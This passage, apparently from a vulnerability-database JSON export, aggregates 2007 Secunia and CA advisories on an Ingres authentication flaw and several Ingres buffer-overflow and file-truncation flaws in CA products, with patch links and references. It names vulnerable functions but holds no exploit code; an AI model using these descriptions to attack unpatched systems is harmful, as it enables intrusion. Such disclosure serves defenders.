security\nrestrictions. and 2.6 on Windows. \n\nSOLUTION:\nApply fixes (requires login):\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415703+HTMPL=kt_document_view.htmpl\n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nIngres:\nhttp://www.ingres.com/support/security-alertDec17.php\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \nTitle: [CAID 35970]: CA Products That Embed Ingres Authentication \nVulnerability\n\nCA Vuln ID (CAID): 35970\n\nCA Advisory Date: 2007-12-19\n\nReported By: Ingres Corporation\n\nImpact: Attacker can gain elevated privileges. \n\nSummary: A potential vulnerability exists in the Ingres software \nthat is embedded in various CA products. This vulnerability exists \nonly on Ingres 2.5 and Ingres 2.6 on Windows, and does not \nmanifest itself on any Unix platform. Ingres r3 and Ingres 2006 \nare not affected. In all reported \ninstances, the application (typically an ASP.NET application using \nthe Ingres ODBC driver) was running on Microsoft IIS Web server, \nand with the Integrated Windows Authentication (IWA) option \nenabled. While IWA is not enabled by default, it is a commonly \nused option. \n\nMitigating Factors: The vulnerability exists only on Windows \nsystems running Microsoft IIS Web server that have the Integrated \nWindows Authentication (IWA) option enabled. \n\nSeverity: CA has given this vulnerability a High risk rating. \n\nAffected Products:\nAll CA products that embed Ingres 2.5 and Ingres 2.6, and also run \nMicrosoft IIS Web server with the Integrated Windows \nAuthentication (IWA) option enabled. \n\nAffected Platforms:\nWindows\n\nStatus and Recommendation (URLs may wrap):\nIngres has issued the following patches to address the \nvulnerabilities. \nIngres 2.6 Single-Byte patch - Ingres 2.6 Single-Byte patch\nftp://ftp.ca.com/caproducts/ips/MDB/Generic_Ingres/IIS_Vulnerability/patch-2.6.0701.12467-win-x86.zip\nIngres 2.6 Double-Byte patch- Ingres 2.6 Double-Byte patch\nftp://ftp.ca.com/caproducts/ips/MDB/Generic_Ingres/IIS_Vulnerability/patch-2.6.0701.12473-win-x86-DBL.zip\nIngres 2.5 Single Byte Patch- Ingres 2.5 Single Byte patch\nftp://ftp.ca.com/caproducts/ips/MDB/Generic_Ingres/IIS_Vulnerability/patch-2.5.0605.12291-win-x86.zip\nPotential problems installing the patches:\nWhile testing these patches, CA identified an install issue when \nthe user is presented with the option to make a backup of the \nIngres installation. In cases where a \u003cspace\u003e is in the path, the \npath is not properly read. The backup does get taken and is by \ndefault stored in the %II_SYSTEM%\\ingres\\install\\backup directory. \nAdditionally, if the user happens to press the \"Set Directory\" \nbutton, the path will be displayed. Clicking \"ok\" will result in a \nmessage stating \"... spaces are not supported in paths... \". This \nalso is an error; pressing cancel will return the user to the \nfirst screen with the default path, and while the displayed path \nis terminated at a space, the actual path does work. To avoid this \nissue, use DOS 8.3 definitions (ex. C:\\progra~1\\CA\\ingres). \n\nHow to determine if you are affected:\nCheck the %II_SYSTEM%\\ingres\\version.rel file to identify the \nIngres version. If the installed version of Ingres 2.6 is a \nDouble-Byte version (should have DBL referenced), please download \nthe 2.6 Double-Byte patch. Otherwise, use the Single-Byte patch. \n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nImportant Security Notice for Customers Using Products that Embed \nIngres on Microsoft Windows ONLY\nhttp://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp\nSolution Document Reference APARs:\nN/A\nCA Security Response Blog posting:\nCA Products That Embed Ingres Authentication Vulnerability\nhttp://community.ca.com/blogs/casecurityresponseblog/archive/2007/12/19.aspx\nCA Vuln ID (CAID): 35970\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35970\nReported By: \nIngres Corporation\nhttp://ingres.com/support/security.php\nhttp://ingres.com/support/security-alertDec17.php\nCVE References: CVE-2007-6334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6334\nOSVDB References: 39358\nhttp://osvdb.org/39358\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Products Ingres User Authentication Security Issue\n\nSECUNIA ADVISORY ID:\nSA28183\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/28183/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nBrightStor ARCserve Backup 11.x\nhttp://secunia.com/product/312/\nBrightStor ARCserve Backup 9.x\nhttp://secunia.com/product/313/\nBrightStor Enterprise Backup 10.x\nhttp://secunia.com/product/314/\nBrightStor Storage Command Center 11.x\nhttp://secunia.com/product/14581/\nBrightStor Storage Resource Manager 11.x\nhttp://secunia.com/product/5909/\nCA Advantage Data Transformer 2.x\nhttp://secunia.com/product/5904/\nCA AllFusion Enterprise Workbench 1.x\nhttp://secunia.com/product/14579/\nCA AllFusion Enterprise Workbench 7.x\nhttp://secunia.com/product/14580/\nCA AllFusion Harvest Change Manager 7.x\nhttp://secunia.com/product/5905/\nCA ARCserve Backup for Laptops \u0026 Desktops 11.x\nhttp://secunia.com/product/5906/\nCA CleverPath Aion 10.x\nhttp://secunia.com/product/5582/\nCA CleverPath Predictive Analysis Server 3.x\nhttp://secunia.com/product/5581/\nCA Embedded Entitlements Manager 8.x\nhttp://secunia.com/product/14582/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Audit 8.x\nhttp://secunia.com/product/5912/\nCA Network Forensics 8.x\nhttp://secunia.com/product/14585/\nCA Unicenter Advanced Systems Management 11.x\nhttp://secunia.com/product/14587/\nCA Unicenter Asset Intelligence 11.x\nhttp://secunia.com/product/14588/\nCA Unicenter Asset Management 11.x\nhttp://secunia.com/product/14589/\nCA Unicenter Asset Portfolio Management 11.x\nhttp://secunia.com/product/7125/\nCA Unicenter Database Command Center 11.x\nhttp://secunia.com/product/12928/\nCA Unicenter Desktop and Server Management 11.x\nhttp://secunia.com/product/14590/\nCA Unicenter Desktop Management Suite 11.x\nhttp://secunia.com/product/14591/\nCA Unicenter Enterprise Job Manager 1.x\nhttp://secunia.com/product/5588/\nCA Unicenter Job Management Option 11.x\nhttp://secunia.com/product/14592/\nCA Unicenter Lightweight Portal 2.x\nhttp://secunia.com/product/14593/\nCA Unicenter Management Portal 3.x\nhttp://secunia.com/product/3936/\nCA Unicenter Network and Systems Management (NSM) 11.x\nhttp://secunia.com/product/14437/\nCA Unicenter Network and Systems Management (NSM) 3.x\nhttp://secunia.com/product/1683/\nCA Unicenter Patch Management 11.x\nhttp://secunia.com/product/14595/\nCA Unicenter Remote Control 11.x\nhttp://secunia.com/product/14596/\nCA Unicenter Remote Control 6.x\nhttp://secunia.com/product/2622/\nCA Unicenter Service Accounting 11.x\nhttp://secunia.com/product/7127/\nCA Unicenter Service Assure 11.x\nhttp://secunia.com/product/7128/\nCA Unicenter Service Assure 2.x\nhttp://secunia.com/product/14597/\nCA Unicenter Service Catalog 11.x\nhttp://secunia.com/product/7129/\nCA Unicenter Service Delivery 11.x\nhttp://secunia.com/product/14598/\nCA Unicenter Service Intelligence 11.x\nhttp://secunia.com/product/14599/\nCA Unicenter Service Metric Analysis 11.x\nhttp://secunia.com/product/7126/\nCA Unicenter Service Metric Analysis 3.x\nhttp://secunia.com/product/14600/\nCA Unicenter ServicePlus Service Desk 11.x\nhttp://secunia.com/product/14602/\nCA Unicenter ServicePlus Service Desk 5.x\nhttp://secunia.com/product/14601/\nCA Unicenter ServicePlus Service Desk 6.x\nhttp://secunia.com/product/1684/\nCA Unicenter Software Delivery 11.x\nhttp://secunia.com/product/7120/\nCA Unicenter TNG 2.x\nhttp://secunia.com/product/3206/\nCA Unicenter Web Services Distributed Management 3.x\nhttp://secunia.com/product/12199/\nCA Unicenter Workload Control Center 1.x\nhttp://secunia.com/product/12932/\nCA Wily SOA Manager 7.x\nhttp://secunia.com/product/14603/\neTrust Directory 8.x\nhttp://secunia.com/product/7114/\neTrust IAM Suite 8.x\nhttp://secunia.com/product/14583/\neTrust Identity Manager 8.x\nhttp://secunia.com/product/14584/\neTrust Secure Content Manager (SCM)\nhttp://secunia.com/product/3391/\neTrust Single Sign-On 7.x\nhttp://secunia.com/product/10747/\neTrust Web Access Control 1.x\nhttp://secunia.com/product/14586/\n\nDESCRIPTION:\nA vulnerability has been reported in CA products, which can be\nexploited by malicious users to bypass certain security\nrestrictions. \n\nSOLUTION:\nApply patches (see the vendor\u0027s advisory for more information)",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-6334"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "BID",
"id": "26959"
},
{
"db": "PACKETSTORM",
"id": "61984"
},
{
"db": "PACKETSTORM",
"id": "62040"
},
{
"db": "PACKETSTORM",
"id": "61983"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-6334",
"trust": 2.8
},
{
"db": "BID",
"id": "26959",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "28187",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "39358",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "28183",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2007-4304",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-4303",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1019134",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004712",
"trust": 0.8
},
{
"db": "NSFOCUS",
"id": "11325",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20071221 [CAID 35970]: CA PRODUCTS THAT EMBED INGRES AUTHENTICATION VULNERABILITY",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200712-299",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "61984",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "62040",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "61983",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "26959"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "PACKETSTORM",
"id": "61984"
},
{
"db": "PACKETSTORM",
"id": "62040"
},
{
"db": "PACKETSTORM",
"id": "61983"
},
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"id": "VAR-200712-0115",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T23:15:50.362000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "contentID={EA69B32B-90DA-4BA6-A6A5-48C04C888524}",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EA69B32B-90DA-4BA6-A6A5-48C04C888524}"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.ingres.com/support/security-alertdec17.php"
},
{
"trust": 2.1,
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/26959"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/28187"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/28183"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1019134"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/39358"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-6334"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-6334"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/485448/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/4304"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/4303"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/11325"
},
{
"trust": 0.4,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415703+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/485448"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/28187/"
},
{
"trust": 0.2,
"url": "https://psi.secunia.com/?page=changelog"
},
{
"trust": 0.2,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14576/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://community.ca.com/blogs/casecurityresponseblog/archive/2007/12/19.aspx"
},
{
"trust": 0.1,
"url": "http://ingres.com/support/security.php"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/39358"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35970"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://ingres.com/support/security-alertdec17.php"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-6334"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7126/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/314/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12932/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14599/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14600/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5912/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3391/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12928/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7127/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14601/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14603/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/28183/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5906/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14598/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7129/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14597/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14437/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5904/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3936/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7128/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14602/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5905/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5909/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1684/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12199/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7125/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7120/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10747/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/313/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7114/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
}
],
"sources": [
{
"db": "BID",
"id": "26959"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "PACKETSTORM",
"id": "61984"
},
{
"db": "PACKETSTORM",
"id": "62040"
},
{
"db": "PACKETSTORM",
"id": "61983"
},
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "26959"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "PACKETSTORM",
"id": "61984"
},
{
"db": "PACKETSTORM",
"id": "62040"
},
{
"db": "PACKETSTORM",
"id": "61983"
},
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-12-20T00:00:00",
"db": "BID",
"id": "26959"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"date": "2007-12-24T18:50:38",
"db": "PACKETSTORM",
"id": "61984"
},
{
"date": "2007-12-24T19:52:23",
"db": "PACKETSTORM",
"id": "62040"
},
{
"date": "2007-12-24T18:50:38",
"db": "PACKETSTORM",
"id": "61983"
},
{
"date": "2007-12-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"date": "2007-12-20T23:46:00",
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T09:28:00",
"db": "BID",
"id": "26959"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"date": "2007-12-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Used in products Windows of Ingres Vulnerability gained in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
}
],
"trust": 0.6
}
}
VAR-200706-0399
Vulnerability from variot - Updated: 2025-04-10 22:57Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or overwrite files. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected.
1) Ingres controllable pointer overwrite vulnerability (reported by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450] Description: An unauthenticated attacker can potentially execute arbitrary code within the context of the database server.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
